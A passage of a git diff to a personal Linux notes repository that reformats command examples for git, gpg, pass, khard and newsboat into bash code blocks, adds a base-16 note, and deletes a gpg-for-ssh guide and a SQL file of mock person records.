name ending in `.flac`. The first command means this will run but also confirm which files will be deleted, and which will be transferred, us `batch = true` instead. Or you can deleted that line in the `.prf` file and run it with a flag: -> unison -batch *backup*.prf +```bash +unison -batch *backup*.prf +``` Set unison to run with crontab or a systemd unit file to have directories synchronize automatically. - ## Problem Solving You will see data files summarizing what has happened in the `~/.unison` directory. diff --git a/data/base_16.md b/data/base_16.md new file mode 100644 index 0000000..7686ca5 --- /dev/null +++ b/data/base_16.md @@ -0,0 +1,8 @@ +--- +title: "Base 16" +tags: [ "Documentation", "Data" ] +--- + +```bash +printf "%x" $NUMBER +``` diff --git a/data/git-lfs.md b/data/git-lfs.md index a06f149..52e7a74 100644 --- a/data/git-lfs.md +++ b/data/git-lfs.md @@ -5,14 +5,20 @@ tags: [ "Documentation", "data" ] Install, and add with -> git lfs install +```bash +git lfs install +``` Then track some filetype with: -> git lfs track "\*.ttf" +```bash +git lfs track "\*.ttf" +``` Or a directory with: -> git lfs track "images/" +```bash +git lfs track "images/" +``` All changes require adding `.gitattributes`. diff --git a/data/git.md b/data/git.md index 438e2e9..21adc52 100644 --- a/data/git.md +++ b/data/git.md @@ -6,93 +6,140 @@ tags: [ "Documentation", "data" ] ## New Machines -> git config --global user.email *"malinfreeborn@posteo.net"* +```bash +git config --global user.email "$YOUR_EMAIL" +``` -> git config --global user.name *"Malin Freeborn"* +```bash +git config --global user.name "$YOUR_NAME" +``` # New Git -Start a git in a folder: +Start a git in directory `$DIR`: -> mkdir *project* && cd *project* +```bash +mkdir $DIR && cd $DIR +``` -> git init +```bash +git init +``` Make a file explaining what the project does: -> vim README.md +```bash +vim README.md +``` -> git add README.md +Add this to the git: + +```bash +git add README.md +``` Then make the initial commit, explaining the change you just made: -> git commit +```bash +git commit +``` # Working -Once you make a change to some file ("file.sh"), add it and make a commit explaining it. +Once you make a change to some file, add it and make a commit explaining it. -> git add file.sh +```bash +git add $FILE +``` -> git commit -m"change file.sh" +```bash +git commit -m"change $FILE" +``` Check your history: -> git log +```bash +git log +``` # Remotes If you want to keep a copy on a public site such as Gitlab, so others can see it, then go there and create a blank project (no readme, nothing). -Find the address you want and add it as a remote: +Give it the same name as the `$DIR` directory, above. -> git remote add *gitlab* *https://gitlab.com/username/projectx* +Add this as a remote: + +```bash +REMOTE=gitlab +git remote add $REMOTE https://gitlab.com/$USERNAME/$DIR +``` Tell git you're pushing the branch "master" to the remote repo "origin": -> git push -u master origin +```bash +git push -u master origin +``` If someone makes a change on the remote, pull it down with: -> git pull +```bash +git pull +``` # Branches A branch is a full copy of the project to test additional ideas. You can make a new branch called 'featurez' like this: -> git branch *featurez* +```bash +git branch *featurez* +``` Have a look at all your branches: -> git branch +```bash +git branch +``` Switch to your new branch: -> git checkout *featurez* +```bash +git checkout *featurez* +``` And if your changes are rubbish, checkout the "master" branch again, then delete "featurez": -> git branch -D *featurez* +```bash +git branch -D *featurez* +``` Or if it's a good branch, push it to the remote: -> git push *origin* *featurez* +```bash +git push *origin* *featurez* +``` ## Merging Once you like the feature, merge it into the main branch. Switch to master then merge it: -> git merge *featurez* +```bash +git merge *featurez* +``` and delete `featurez` as you've already merged it: -> git branch -d featurez +```bash +git branch -d featurez +``` # Subtree ## Pulling another git repo into a subtree -> git subtree add -P config git@gitlab.com:bindrpg/config.git master +```bash +git subtree add -P config git@gitlab.com:bindrpg/config.git master +``` ## Pulling a Subtree from an existing git @@ -100,13 +147,17 @@ The project has subdirectories sub-1,sub-2,sub-3. The first should be its own r First, we extract its history as an independent item, and make that into a seprate branch. -> git subtree split --prefix=sub-1 -b sub +```bash +git subtree split --prefix=sub-1 -b sub +``` If you want something a few directories deep, you can use `--prefix=sub-1/dir-2/dir-3 Then go and create a new git somewhere else: -> cd ..;mkdir sub-1;cd sub-1;git init --bare +```bash +cd ..;mkdir sub-1;cd sub-1;git init --bare +``` Then go back to your initial git repo, and do the following: @@ -114,38 +165,57 @@ git push ../subtest sub:master Finally, you can clone this repo from your original. -> git clone ../subtest +```bash +git clone ../subtest +``` # Tricks ## Delete All History -> git checkout --orphan temp +```bash +git checkout --orphan temp +``` -> git add -A +```bash +git add -A +``` -> git commit -am "release the commits!" +```bash +git commit -am "release the commits!" +``` -> git branch -D master +```bash +git branch -D master +``` -> git branch -m master +```bash +git branch -m master +``` -> git push -f origin master +```bash +git push -f origin master +``` Gitlab requires more changes, such as going to `settings > repository` and switching the main branch, then stripping protection. ## Clean up Bloated Repo -> git fsck --full +```bash +git fsck --full +``` -> git gc --prune=now --aggressive +```bash +git gc --prune=now --aggressive +``` -> git repack +```bash +git repack +``` ## Find Binary Blobs -``` - +```bash git rev-list --objects --all \ | git cat-file --batch-check='%(objecttype) %(objectname) %(objectsize) %(rest)' \ | sed -n 's/^blob //p' \ diff --git a/data/gpg-ssh.md b/data/gpg-ssh.md deleted file mode 100644 index be43c2e..0000000 --- a/data/gpg-ssh.md +++ /dev/null @@ -1,54 +0,0 @@ ---- -title: "gpg keys with ssh" -tags: [ "Documentation", "distros" ] ---- - - - -Install `gnupg`. - -Generate a new gpg key just for authentication: - -> gpg2 --expert --edit-key 024C6B1C84449BD1CB4DF7A152295D2377F4D70F - -Toggle options `S`, `E`, and `A` until the following output: - -``` -Current allowed actions: Authenticate -``` - -Add ssh to the gpg key agent. - -> echo enable-ssh-support >> ~/.gnupg/gpg-agent.conf - -This won't take effect until you restart the gpg agent, so kill it: - -> gpgconf --kill gpg-agent - -> gpgconf --launch gpg-agent - -Use 2048 (or whatever) bits, save, and exit. - -Add this to your `~/.bash_profile`: - -``` -export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket) -``` - -> source ~/.bash_profile - -Find the ssh key's keygrip with: - -> gpg -k --with-keygrip - -It's the one with `[A]` next to it. -Add it to `~/.gnupg/sshcontrol`. - -> echo 1P0P6SA7S07Q8198414P126OR0514R3R8Q1389SP > ~/.gnupg/sshcontrol - -Confirm it's added: - -> ssh-add -l diff --git a/data/gpg.md b/data/gpg.md index f08635e..ec1704f 100644 --- a/data/gpg.md +++ b/data/gpg.md @@ -6,13 +6,17 @@ tags: [ "Documentation", "data" ] Generate keys: -> gpg --gen-key +```bash +gpg --gen-key +``` Follow the guide. # Encrypting a file -> gpg -r malinfreeborn@posteo.net -e file +```bash +gpg -r malinfreeborn@posteo.net -e file +``` `-r` specifies the recipient. @@ -28,11 +32,15 @@ gpg --list-keys Make a password with a password (cypher encryption). -> gpg -c --output passwords.txt +```bash +gpg -c --output passwords.txt +``` or -> gpg -c > passwords.txt +```bash +gpg -c > passwords.txt +``` Put in a password. @@ -40,17 +48,23 @@ Write message then stop with Ctrl+d. Get the message back out the file with: -> gpg -d passwords.txt +```bash +gpg -d passwords.txt +``` # Circles of Trust Search for a key at any key store: -> gpg --search-keys nestorv +```bash +gpg --search-keys nestorv +``` Once you've made a decision about someone: -> gpg --list-keys +```bash +gpg --list-keys +``` You get something like this: @@ -67,27 +81,39 @@ This is a fingerprint. You can now decide the trust level (this stays on your computer). -> gpg --edit-key *CD30421FD825696BD95F1FF644C62C57B790D3CF* +```bash +gpg --edit-key *CD30421FD825696BD95F1FF644C62C57B790D3CF* +``` Once you're in the interface, type `trust`. -> gpg --sign-key alice@posteo.net +```bash +gpg --sign-key alice@posteo.net +``` Then send those trusted keys up to a server, so people can see you have verified them: -> gpg --send-keys *024C6B1C84449BD1CB4DF7A152295D2377F4D70F* +```bash +gpg --send-keys *024C6B1C84449BD1CB4DF7A152295D2377F4D70F* +``` # Refresh Keys -> gpg --refresh-keys +```bash +gpg --refresh-keys +``` # Export Your public key: -> gpg --output *me*.gpg --armor --export +```bash +gpg --output *me*.gpg --armor --export +``` or -> gpg --export -a *person@email.tld* > *my_key*.pub +```bash +gpg --export -a *person@email.tld* > *my_key*.pub +``` diff --git a/data/khard.md b/data/khard.md index ea27c7f..30cb84d 100644 --- a/data/khard.md +++ b/data/khard.md @@ -4,37 +4,57 @@ tags: [ "Documentation", "Data" ] --- Get the basic config: -> mkdir ~/.config/khard +```bash +mkdir ~/.config/khard +``` -> cp /usr/share/doc/khard/examples/khard/khard.conf.example ~/.config/khard.conf +```bash +cp /usr/share/doc/khard/examples/khard/khard.conf.example ~/.config/khard.conf +``` Short list -> khard list +```bash +khard list +``` Longer list -> khard show +```bash +khard show +``` Show from addressbook 'work' -> khard list -a work +```bash +khard list -a work +``` Make a new contact in address book 'family' -> khard new -a family +```bash +khard new -a family +``` -> khard edit grampa +```bash +khard edit grampa +``` -> khard remove bob +```bash +khard remove bob +``` Move contact 'nina' from 'work' to 'home' address book. -> khard move -a home nina -A work +```bash +khard move -a home nina -A work +``` ## Advanced Merge: -> khard merge [-a source_abook] [-u uid|search terms [search terms ...]] [-A target_abook] [-U target_uid|-t target_search_terms] +```bash +khard merge [-a source_abook] [-u uid|search terms [search terms ...]] [-A target_abook] [-U target_uid|-t target_search_terms] +``` diff --git a/data/newsboat.md b/data/newsboat.md index e8b8c3a..bcab08e 100644 --- a/data/newsboat.md +++ b/data/newsboat.md @@ -4,9 +4,13 @@ tags: [ "Documentation", "RSS" ] --- Create the configuration directory before you start, and add at least 1 URL. -> mkdir ~/.config/newsboat +```bash +mkdir ~/.config/newsboat +``` -> echo 'https://voidlinux.org/atom.xml foss tech' >> ~/.config/newsboat/urls +```bash +echo 'https://voidlinux.org/atom.xml foss tech' >> ~/.config/newsboat/urls +``` Start `newsobat` and press `r` to load your feed. @@ -24,7 +28,9 @@ You can input a Youtube channel by adding this, with the channel's ID at the end To get the channel ID without hunting: -> curl *'https://www.youtube.com/@1minfilms'* | grep -oE 'browseId":"U\w+"' | tail | cut -d'"' -f3 +```bash +curl *'https://www.youtube.com/@1minfilms'* | grep -oE 'browseId":"U\w+"' | tail | cut -d'"' -f3 +``` You can add arbitrary commands to get an RSS feed. For example, to get a Gemini feed, install `gemget`, then put this in the configuration file: @@ -58,9 +64,11 @@ Or or `,o` to open an article in w3m: Add vim-like keys: -``` -bind-key j next -bind-key k prev -bind-key j down article -bind-key k up article -``` +> bind-key j next + +> bind-key k prev + +> bind-key j down article + +> bind-key k up article + diff --git a/data/pass.md b/data/pass.md index 05b6e38..1d1b9b8 100644 --- a/data/pass.md +++ b/data/pass.md @@ -8,21 +8,35 @@ Setup [gpg](./gpg.md) keys. Show your gpg secret it: -> gpg --list-secret-keys +```bash +gpg --list-secret-keys +``` Then use the id number under `sec` to make a pass repo: -> pass init 187233O300300814PQ793NSSS539SQ1O6O184532 +```bash +KEY="$(gpg --list-secret-keys | grep -m 1 -A1 '^sec' | tail -n 1)" +``` -To add a basic password, e.g. for an encrypted tarball, use: +```bash +pass init $KEY +``` -> pass add my-tar-gar.gz +To add a basic password, e.g. for `$WEBSITE`: + +```bash +pass $WEBSITE +``` To insert a multiline password, e.g. with a login name: -> pass add -m linuxrocks.online +```bash +pass add -m $WEBSITE +``` Remove a password: -> pass rm linuxrocks.online +```bash +pass rm $WEBSITE +``` diff --git a/data/pdf-to-txt.md b/data/pdf-to-txt.md index 92de8b8..cbc4fc8 100644 --- a/data/pdf-to-txt.md +++ b/data/pdf-to-txt.md @@ -12,10 +12,13 @@ Arch: tesseract-data-eng and poppler-utils ## Script -> pdftoppm -png *file*.pdf test +```bash +pdftoppm -png *file*.pdf test +``` -> for x in \*png; do -> tesseract -l eng "$x" - >> *out*.txt -> done +```bash +for x in \*png; do + tesseract -l eng "$x" - >> *out*.txt +done +``` -- [Example script](data/pdf-to-txt.sh) diff --git a/data/sql/person.sql b/data/sql/person.sql deleted file mode 100644 index 7b20ea6..0000000 --- a/data/sql/person.sql +++ /dev/null @@ -1,1009 +0,0 @@ -create table person ( - id BIGSERIAL NOT NULL PRIMARY KEY, - first_name VARCHAR(50) NOT NULL, - last_name VARCHAR(50) NOT NULL, - email VARCHAR(50), - gender VARCHAR(7) NOT NULL, - date_of_birth DATE, - country_of_birth VARCHAR(50) -); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vern', 'Firebrace', 'vfirebrace0@answers.com', 'Male', '1/11/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gabbey', 'McCloy', 'gmccloy1@parallels.com', 'Female', '5/1/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lida', 'Pippin', null, 'Female', '9/14/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Electra', 'Tabbitt', 'etabbitt3@pagesperso-orange.fr', 'Female', '11/19/2019', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Anatola', 'Conklin', 'aconklin4@webeden.co.uk', 'Female', '10/20/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Birch', 'Kingsland', 'bkingsland5@fastcompany.com', 'Male', '9/14/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Daryl', 'Lyndon', 'dlyndon6@army.mil', 'Male', '4/18/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tanya', 'Dighton', 'tdighton7@psu.edu', 'Female', '6/23/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ev', 'Dybell', 'edybell8@engadget.com', 'Male', '3/27/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stephani', 'Poulsom', null, 'Female', '2/24/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hallsy', 'Sommerville', null, 'Male', '8/9/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Raddy', 'Aronowicz', 'raronowiczb@ihg.com', 'Male', '8/21/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rudyard', 'Gemmell', 'rgemmellc@blog.com', 'Male', '4/21/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dennet', 'Cowles', 'dcowlesd@ucoz.ru', 'Male', '9/6/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caitlin', 'Pirrey', 'cpirreye@chronoengine.com', 'Female', '3/14/2019', 'Azerbaijan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jessee', 'Babon', 'jbabonf@google.com', 'Male', '11/6/2019', 'Kyrgyzstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Faythe', 'Roddick', null, 'Female', '9/17/2019', 'Fiji'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dwayne', 'Siemons', 'dsiemonsh@irs.gov', 'Male', '12/8/2018', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kimberly', 'Bonhan', 'kbonhani@t.co', 'Female', '1/25/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Heath', 'Tunnoch', null, 'Female', '12/1/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pierson', 'Follen', 'pfollenk@ning.com', 'Male', '8/2/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Prentice', 'Ledgister', null, 'Male', '3/19/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cindi', 'Sevin', 'csevinm@cyberchimps.com', 'Female', '11/15/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Olimpia', 'Jelf', 'ojelfn@wiley.com', 'Female', '7/31/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Urson', 'Woodyeare', 'uwoodyeareo@wikimedia.org', 'Male', '5/25/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mil', 'Dunstall', 'mdunstallp@blog.com', 'Female', '5/9/2019', 'Costa Rica'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tandie', 'Gribbins', 'tgribbinsq@ustream.tv', 'Female', '12/30/2018', 'Kosovo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sauveur', 'Bracegirdle', 'sbracegirdler@freewebs.com', 'Male', '7/28/2019', 'Yemen'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clemmie', 'Masding', 'cmasdings@csmonitor.com', 'Female', '10/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Haroun', 'MacRannell', 'hmacrannellt@so-net.ne.jp', 'Male', '5/14/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Norine', 'Lishmund', null, 'Female', '1/19/2019', 'North Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fey', 'Lewing', 'flewingv@cnbc.com', 'Female', '6/11/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rutger', 'Stone', null, 'Male', '9/18/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nobe', 'Martinson', null, 'Male', '1/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Spence', 'Kenyam', 'skenyamy@rakuten.co.jp', 'Male', '10/23/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Teador', 'Rackley', 'trackleyz@thetimes.co.uk', 'Male', '11/19/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rudolf', 'Althrop', 'ralthrop10@unc.edu', 'Male', '12/13/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Granny', 'Jachimiak', 'gjachimiak11@surveymonkey.com', 'Male', '4/25/2019', 'Norway'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Georgia', 'Khristoforov', null, 'Female', '8/12/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jon', 'Rehor', 'jrehor13@slashdot.org', 'Male', '8/25/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Terrijo', 'Lawlan', 'tlawlan14@soup.io', 'Female', '2/8/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shelley', 'Ritchman', 'sritchman15@aboutads.info', 'Male', '11/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gerianne', 'Leach', null, 'Female', '2/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bride', 'Fellon', null, 'Female', '1/25/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Florentia', 'Butterick', null, 'Female', '6/8/2019', 'Mongolia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dulcea', 'Kinder', 'dkinder19@eventbrite.com', 'Female', '12/20/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bebe', 'Tribell', null, 'Female', '2/18/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Doro', 'Posten', 'dposten1b@google.it', 'Female', '7/5/2019', 'Armenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brandtr', 'Clausewitz', null, 'Male', '12/26/2018', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Emelita', 'Cranidge', 'ecranidge1d@nhs.uk', 'Female', '10/16/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tyson', 'Thompson', 'tthompson1e@dot.gov', 'Male', '10/29/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Leslie', 'Loweth', 'lloweth1f@adobe.com', 'Male', '8/20/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bartholemy', 'Bunnell', null, 'Male', '5/24/2019', 'Nepal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Constance', 'Chrismas', null, 'Female', '12/25/2018', 'Ethiopia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Allan', 'Offa', 'aoffa1i@yellowbook.com', 'Male', '12/9/2018', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Don', 'Mardlin', 'dmardlin1j@macromedia.com', 'Male', '7/9/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nevsa', 'Farguhar', null, 'Female', '10/26/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wyndham', 'Bolden', 'wbolden1l@sakura.ne.jp', 'Male', '9/10/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alonso', 'Meeny', 'ameeny1m@live.com', 'Male', '7/28/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giralda', 'MacNeely', 'gmacneely1n@utexas.edu', 'Female', '4/24/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dag', 'Warrener', 'dwarrener1o@i2i.jp', 'Male', '9/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cloe', 'Verrechia', 'cverrechia1p@paypal.com', 'Female', '2/27/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Merell', 'Barcroft', 'mbarcroft1q@dailymotion.com', 'Male', '3/17/2019', 'Democratic Republic of the Congo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Maddalena', 'Wadwell', 'mwadwell1r@slate.com', 'Female', '1/2/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cordie', 'Fenimore', 'cfenimore1s@ox.ac.uk', 'Male', '7/9/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Petra', 'Dolton', null, 'Female', '7/7/2019', 'South Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lowe', 'Allgood', 'lallgood1u@omniture.com', 'Male', '3/13/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Netti', 'Goodsell', 'ngoodsell1v@google.ca', 'Female', '8/18/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jose', 'Barbisch', 'jbarbisch1w@nsw.gov.au', 'Male', '8/15/2019', 'Armenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alexa', 'Reinbach', null, 'Female', '10/7/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Horst', 'Durnian', 'hdurnian1y@samsung.com', 'Male', '6/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sully', 'Margeram', 'smargeram1z@japanpost.jp', 'Male', '11/7/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Loni', 'Hebborne', 'lhebborne20@usda.gov', 'Female', '6/10/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dorthy', 'Moxham', null, 'Female', '2/27/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Harold', 'Westfalen', 'hwestfalen22@gravatar.com', 'Male', '8/14/2019', 'Macedonia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cos', 'Boss', null, 'Male', '10/30/2019', 'United Kingdom'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nalani', 'Schneidar', 'nschneidar24@soundcloud.com', 'Female', '12/20/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Maggie', 'MacMurray', 'mmacmurray25@webmd.com', 'Female', '3/31/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ranee', 'Antwis', 'rantwis26@miibeian.gov.cn', 'Female', '11/29/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sianna', 'Le Provest', 'sleprovest27@craigslist.org', 'Female', '7/21/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ardelis', 'Robe', null, 'Female', '12/30/2018', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ainsley', 'Thomann', null, 'Female', '2/9/2019', 'Norway'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wallis', 'Birtchnell', 'wbirtchnell2a@biblegateway.com', 'Female', '11/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carl', 'Heading', 'cheading2b@seesaa.net', 'Male', '6/27/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caryl', 'Pridden', 'cpridden2c@nifty.com', 'Female', '4/24/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pasquale', 'Domino', 'pdomino2d@sitemeter.com', 'Male', '11/5/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garik', 'Severns', 'gseverns2e@qq.com', 'Male', '4/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rhett', 'Belvard', 'rbelvard2f@boston.com', 'Male', '11/21/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Veda', 'Falla', null, 'Female', '1/22/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Coleman', 'Douthwaite', 'cdouthwaite2h@europa.eu', 'Male', '5/6/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pyotr', 'Bartens', 'pbartens2i@techcrunch.com', 'Male', '11/20/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Amandy', 'Niche', 'aniche2j@guardian.co.uk', 'Female', '3/14/2019', 'Ireland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clayborn', 'Caville', 'ccaville2k@plala.or.jp', 'Male', '11/13/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mariana', 'Vanyutin', 'mvanyutin2l@so-net.ne.jp', 'Female', '4/1/2019', 'Dominican Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Florette', 'Bilsborrow', 'fbilsborrow2m@ucoz.com', 'Female', '8/12/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ferrell', 'Nordass', null, 'Male', '3/28/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jimmy', 'Bartusek', 'jbartusek2o@va.gov', 'Male', '7/22/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ricky', 'Duffield', 'rduffield2p@list-manage.com', 'Male', '5/8/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karissa', 'Antonowicz', null, 'Female', '5/20/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gilbertine', 'Mylchreest', 'gmylchreest2r@ox.ac.uk', 'Female', '2/2/2019', 'South Africa'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sherm', 'Chamberlaine', 'schamberlaine2s@wp.com', 'Male', '5/31/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ingrim', 'Wigzell', 'iwigzell2t@php.net', 'Male', '11/11/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karola', 'Jessen', 'kjessen2u@linkedin.com', 'Female', '10/29/2019', 'Palestinian Territory'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brit', 'Keal', 'bkeal2v@house.gov', 'Male', '10/3/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gayler', 'Maskall', 'gmaskall2w@cornell.edu', 'Male', '5/25/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Freddy', 'Grumble', 'fgrumble2x@mysql.com', 'Female', '3/18/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kally', 'McPhelimy', 'kmcphelimy2y@yellowpages.com', 'Female', '7/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lidia', 'Scardefield', null, 'Female', '8/23/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carlynne', 'Rummin', 'crummin30@canalblog.com', 'Female', '2/13/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kalle', 'Fones', 'kfones31@dailymail.co.uk', 'Male', '7/13/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, 